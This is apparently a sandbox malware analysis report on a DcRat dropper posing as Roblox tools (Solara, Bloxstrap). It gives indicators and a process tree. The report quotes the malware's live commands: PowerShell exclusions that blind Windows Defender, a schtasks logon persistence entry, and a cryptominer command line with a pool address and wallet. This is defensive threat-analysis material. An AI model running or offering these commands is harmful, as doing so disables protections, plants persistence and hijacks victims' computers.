4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e SolaraBootstrapper.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1620 schtasks.exe 2712 schtasks.exe 2716 schtasks.exe 2088 schtasks.exe 1784 schtasks.exe 1736 schtasks.exe 2656 schtasks.exe 2716 schtasks.exe 1028 schtasks.exe 2408 schtasks.exe 1228 schtasks.exe 1508 schtasks.exe 2056 schtasks.exe 2772 schtasks.exe 1632 schtasks.exe 1696 schtasks.exe 1644 schtasks.exe 2696 schtasks.exe 2740 schtasks.exe 1968 schtasks.exe 2620 schtasks.exe 1624 schtasks.exe 2224 schtasks.exe 2520 schtasks.exe 2840 schtasks.exe 840 schtasks.exe 1624 schtasks.exe 1972 schtasks.exe 2316 schtasks.exe 1228 schtasks.exe 2968 schtasks.exe 2228 schtasks.exe 2460 schtasks.exe 2556 schtasks.exe 1392 schtasks.exe 2528 schtasks.exe 1616 schtasks.exe 2620 schtasks.exe 2248 schtasks.exe 2404 schtasks.exe 956 schtasks.exe 2708 schtasks.exe 2500 schtasks.exe 1152 schtasks.exe 1436 schtasks.exe 2272 schtasks.exe 1780 schtasks.exe 284 schtasks.exe 2100 schtasks.exe 1944 schtasks.exe 2860 schtasks.exe 2768 schtasks.exe 2496 schtasks.exe 1344 schtasks.exe 2912 schtasks.exe 2284 schtasks.exe 1796 schtasks.exe 2344 schtasks.exe 2316 schtasks.exe 1492 schtasks.exe 2328 schtasks.exe 1156 schtasks.exe 2536 schtasks.exe 2900 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
SolaraBootstrapper.exeRefcrt.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesppsvc.exeCMD.exeschtasks.execonhost.exesddsfsdf.execmd.exepowershell.exeMsiExec.exepowershell.execmd.exeschtasks.exepid process 1192 SolaraBootstrapper.exe 1192 SolaraBootstrapper.exe 2980 Refcrt.exe 2980 Refcrt.exe 2980 Refcrt.exe 2980 Refcrt.exe 2980 Refcrt.exe 2980 Refcrt.exe 912 powershell.exe 1292 powershell.exe 1952 powershell.exe 2404 powershell.exe 1772 powershell.exe 564 powershell.exe 1484 powershell.exe 1788 powershell.exe 1576 powershell.exe 940 powershell.exe 2468 powershell.exe 3032 powershell.exe 1276 powershell.exe 2432 powershell.exe 584 powershell.exe 2360 powershell.exe 848 sppsvc.exe 848 sppsvc.exe 848 sppsvc.exe 848 sppsvc.exe 848 sppsvc.exe 848 sppsvc.exe 848 sppsvc.exe 848 sppsvc.exe 848 sppsvc.exe 848 sppsvc.exe 1720 CMD.exe 2312 schtasks.exe 1228 conhost.exe 1228 conhost.exe 2372 sddsfsdf.exe 2372 sddsfsdf.exe 2372 sddsfsdf.exe 2376 cmd.exe 2756 powershell.exe 2372 sddsfsdf.exe 2372 sddsfsdf.exe 2756 powershell.exe 1948 MsiExec.exe 2372 sddsfsdf.exe 2100 powershell.exe 2372 sddsfsdf.exe 2100 powershell.exe 2448 cmd.exe 2712 schtasks.exe 2372 sddsfsdf.exe 848 sppsvc.exe 848 sppsvc.exe 848 sppsvc.exe 848 sppsvc.exe 2372 sddsfsdf.exe 2372 sddsfsdf.exe 2372 sddsfsdf.exe 2372 sddsfsdf.exe 2372 sddsfsdf.exe 2372 sddsfsdf.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
sppsvc.exepid process 848 sppsvc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
sddsfsdf.exeSolaraBootstrapper.exeRefcrt.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesppsvc.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exemsiexec.exemsiexec.execonhost.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2372 sddsfsdf.exe Token: SeDebugPrivilege 1192 SolaraBootstrapper.exe Token: SeDebugPrivilege 2980 Refcrt.exe Token: SeDebugPrivilege 912 powershell.exe Token: SeDebugPrivilege 1292 powershell.exe Token: SeDebugPrivilege 1952 powershell.exe Token: SeDebugPrivilege 2404 powershell.exe Token: SeDebugPrivilege 1772 powershell.exe Token: SeDebugPrivilege 564 powershell.exe Token: SeDebugPrivilege 1484 powershell.exe Token: SeDebugPrivilege 848 sppsvc.exe Token: SeDebugPrivilege 1788 powershell.exe Token: SeDebugPrivilege 1576 powershell.exe Token: SeDebugPrivilege 940 powershell.exe Token: SeDebugPrivilege 2468 powershell.exe Token: SeDebugPrivilege 3032 powershell.exe Token: SeDebugPrivilege 1276 powershell.exe Token: SeDebugPrivilege 2432 powershell.exe Token: SeDebugPrivilege 584 powershell.exe Token: SeDebugPrivilege 2360 powershell.exe Token: SeShutdownPrivilege 1524 msiexec.exe Token: SeIncreaseQuotaPrivilege 1524 msiexec.exe Token: SeRestorePrivilege 1660 msiexec.exe Token: SeTakeOwnershipPrivilege 1660 msiexec.exe Token: SeSecurityPrivilege 1660 msiexec.exe Token: SeCreateTokenPrivilege 1524 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1524 msiexec.exe Token: SeLockMemoryPrivilege 1524 msiexec.exe Token: SeIncreaseQuotaPrivilege 1524 msiexec.exe Token: SeMachineAccountPrivilege 1524 msiexec.exe Token: SeTcbPrivilege 1524 msiexec.exe Token: SeSecurityPrivilege 1524 msiexec.exe Token: SeTakeOwnershipPrivilege 1524 msiexec.exe Token: SeLoadDriverPrivilege 1524 msiexec.exe Token: SeSystemProfilePrivilege 1524 msiexec.exe Token: SeSystemtimePrivilege 1524 msiexec.exe Token: SeProfSingleProcessPrivilege 1524 msiexec.exe Token: SeIncBasePriorityPrivilege 1524 msiexec.exe Token: SeCreatePagefilePrivilege 1524 msiexec.exe Token: SeCreatePermanentPrivilege 1524 msiexec.exe Token: SeBackupPrivilege 1524 msiexec.exe Token: SeRestorePrivilege 1524 msiexec.exe Token: SeShutdownPrivilege 1524 msiexec.exe Token: SeDebugPrivilege 1524 msiexec.exe Token: SeAuditPrivilege 1524 msiexec.exe Token: SeSystemEnvironmentPrivilege 1524 msiexec.exe Token: SeChangeNotifyPrivilege 1524 msiexec.exe Token: SeRemoteShutdownPrivilege 1524 msiexec.exe Token: SeUndockPrivilege 1524 msiexec.exe Token: SeSyncAgentPrivilege 1524 msiexec.exe Token: SeEnableDelegationPrivilege 1524 msiexec.exe Token: SeManageVolumePrivilege 1524 msiexec.exe Token: SeImpersonatePrivilege 1524 msiexec.exe Token: SeCreateGlobalPrivilege 1524 msiexec.exe Token: SeRestorePrivilege 1660 msiexec.exe Token: SeTakeOwnershipPrivilege 1660 msiexec.exe Token: SeDebugPrivilege 1228 conhost.exe Token: SeDebugPrivilege 2756 powershell.exe Token: SeRestorePrivilege 1660 msiexec.exe Token: SeTakeOwnershipPrivilege 1660 msiexec.exe Token: SeDebugPrivilege 2100 powershell.exe Token: SeRestorePrivilege 1660 msiexec.exe Token: SeTakeOwnershipPrivilege 1660 msiexec.exe Token: SeRestorePrivilege 1660 msiexec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exeYoutube.exeResult.exesolara.exeDCRatBuild.exedescription pid process target process PID 1976 wrote to memory of 2548 1976 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe Youtube.exe PID 1976 wrote to memory of 2548 1976 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe Youtube.exe PID 1976 wrote to memory of 2548 1976 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe Youtube.exe PID 1976 wrote to memory of 2548 1976 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe Youtube.exe PID 1976 wrote to memory of 2548 1976 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe Youtube.exe PID 1976 wrote to memory of 2548 1976 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe Youtube.exe PID 1976 wrote to memory of 2548 1976 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe Youtube.exe PID 1976 wrote to memory of 2372 1976 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe sddsfsdf.exe PID 1976 wrote to memory of 2372 1976 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe sddsfsdf.exe PID 1976 wrote to memory of 2372 1976 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe sddsfsdf.exe PID 1976 wrote to memory of 2372 1976 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe sddsfsdf.exe PID 2548 wrote to memory of 2740 2548 Youtube.exe Result.exe PID 2548 wrote to memory of 2740 2548 Youtube.exe Result.exe PID 2548 wrote to memory of 2740 2548 Youtube.exe Result.exe PID 2548 wrote to memory of 2740 2548 Youtube.exe Result.exe PID 2548 wrote to memory of 2740 2548 Youtube.exe Result.exe PID 2548 wrote to memory of 2740 2548 Youtube.exe Result.exe PID 2548 wrote to memory of 2740 2548 Youtube.exe Result.exe PID 2548 wrote to memory of 2908 2548 Youtube.exe DCRatBuild.exe PID 2548 wrote to memory of 2908 2548 Youtube.exe DCRatBuild.exe PID 2548 wrote to memory of 2908 2548 Youtube.exe DCRatBuild.exe PID 2548 wrote to memory of 2908 2548 Youtube.exe DCRatBuild.exe PID 2548 wrote to memory of 2908 2548 Youtube.exe DCRatBuild.exe PID 2548 wrote to memory of 2908 2548 Youtube.exe DCRatBuild.exe PID 2548 wrote to memory of 2908 2548 Youtube.exe DCRatBuild.exe PID 2548 wrote to memory of 2752 2548 Youtube.exe Bloxstrap.exe PID 2548 wrote to memory of 2752 2548 Youtube.exe Bloxstrap.exe PID 2548 wrote to memory of 2752 2548 Youtube.exe Bloxstrap.exe PID 2548 wrote to memory of 2752 2548 Youtube.exe Bloxstrap.exe PID 2740 wrote to memory of 1192 2740 Result.exe SolaraBootstrapper.exe PID 2740 wrote to memory of 1192 2740 Result.exe SolaraBootstrapper.exe PID 2740 wrote to memory of 1192 2740 Result.exe SolaraBootstrapper.exe PID 2740 wrote to memory of 1192 2740 Result.exe SolaraBootstrapper.exe PID 2740 wrote to memory of 1192 2740 Result.exe SolaraBootstrapper.exe PID 2740 wrote to memory of 1192 2740 Result.exe SolaraBootstrapper.exe PID 2740 wrote to memory of 1192 2740 Result.exe SolaraBootstrapper.exe PID 2740 wrote to memory of 1972 2740 Result.exe solara.exe PID 2740 wrote to memory of 1972 2740 Result.exe solara.exe PID 2740 wrote to memory of 1972 2740 Result.exe solara.exe PID 2740 wrote to memory of 1972 2740 Result.exe solara.exe PID 2740 wrote to memory of 1972 2740 Result.exe solara.exe PID 2740 wrote to memory of 1972 2740 Result.exe solara.exe PID 2740 wrote to memory of 1972 2740 Result.exe solara.exe PID 1972 wrote to memory of 2932 1972 solara.exe WScript.exe PID 1972 wrote to memory of 2932 1972 solara.exe WScript.exe PID 1972 wrote to memory of 2932 1972 solara.exe WScript.exe PID 1972 wrote to memory of 2932 1972 solara.exe WScript.exe PID 1972 wrote to memory of 2932 1972 solara.exe WScript.exe PID 1972 wrote to memory of 2932 1972 solara.exe WScript.exe PID 1972 wrote to memory of 2932 1972 solara.exe WScript.exe PID 2908 wrote to memory of 1920 2908 DCRatBuild.exe WScript.exe PID 2908 wrote to memory of 1920 2908 DCRatBuild.exe WScript.exe PID 2908 wrote to memory of 1920 2908 DCRatBuild.exe WScript.exe PID 2908 wrote to memory of 1920 2908 DCRatBuild.exe WScript.exe PID 2908 wrote to memory of 1920 2908 DCRatBuild.exe WScript.exe PID 2908 wrote to memory of 1920 2908 DCRatBuild.exe WScript.exe PID 2908 wrote to memory of 1920 2908 DCRatBuild.exe WScript.exe PID 2548 wrote to memory of 1212 2548 Youtube.exe Frage build.exe PID 2548 wrote to memory of 1212 2548 Youtube.exe Frage build.exe PID 2548 wrote to memory of 1212 2548 Youtube.exe Frage build.exe PID 2548 wrote to memory of 1212 2548 Youtube.exe Frage build.exe PID 2548 wrote to memory of 1212 2548 Youtube.exe Frage build.exe PID 2548 wrote to memory of 1212 2548 Youtube.exe Frage build.exe PID 2548 wrote to memory of 1212 2548 Youtube.exe Frage build.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe"C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe"1⤵
- DcRat
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Users\Admin\AppData\Local\Temp\Youtube.exe"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Users\Admin\AppData\Local\Temp\Result.exe"C:\Users\Admin\AppData\Local\Temp\Result.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1192 -
C:\Windows\SysWOW64\msiexec.exe"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1192 -s 16565⤵
- Loads dropped DLL
- Program crash
PID:2080
-
-
-
C:\Users\Admin\AppData\Local\Temp\solara.exe"C:\Users\Admin\AppData\Local\Temp\solara.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"5⤵PID:2932
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "6⤵
- Loads dropped DLL
PID:784 -
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"7⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\System.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\CRMLog\csrss.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\AppPatch\ja-JP\smss.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Bloxstrap.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\services.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\Refcrt.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\csrss.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Music\csrss.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\sppsvc.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\dllhost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\Windows\explorer.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\Bloxstrap.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
C:\Windows\twain_32\sppsvc.exe"C:\Windows\twain_32\sppsvc.exe"8⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:848
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"4⤵PID:1920
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "5⤵
- Loads dropped DLL
PID:2112 -
C:\winNet\ComContainerbrowserRefRuntime.exe"C:\winNet/ComContainerbrowserRefRuntime.exe"6⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2976 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0lbrM5rdln.bat"7⤵PID:2876
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:2840
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:1744
-
-
C:\winNet\WerFault.exe"C:\winNet\WerFault.exe"8⤵
- Executes dropped EXE
PID:2096
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"3⤵
- Executes dropped EXE
PID:2752 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1228 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2448 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"6⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:2712
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"5⤵
- Loads dropped DLL
PID:2712 -
C:\Users\Admin\Bloxstrap.exeC:\Users\Admin\Bloxstrap.exe6⤵
- Executes dropped EXE
PID:1744 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"7⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2620 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit8⤵PID:1952
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"9⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:2348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"9⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:2040
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
- Executes dropped EXE
PID:236 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"9⤵PID:2040
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth8⤵PID:2228
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Frage build.exe"C:\Users\Admin\AppData\Local\Temp\Frage build.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1212 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"4⤵PID:2972
-
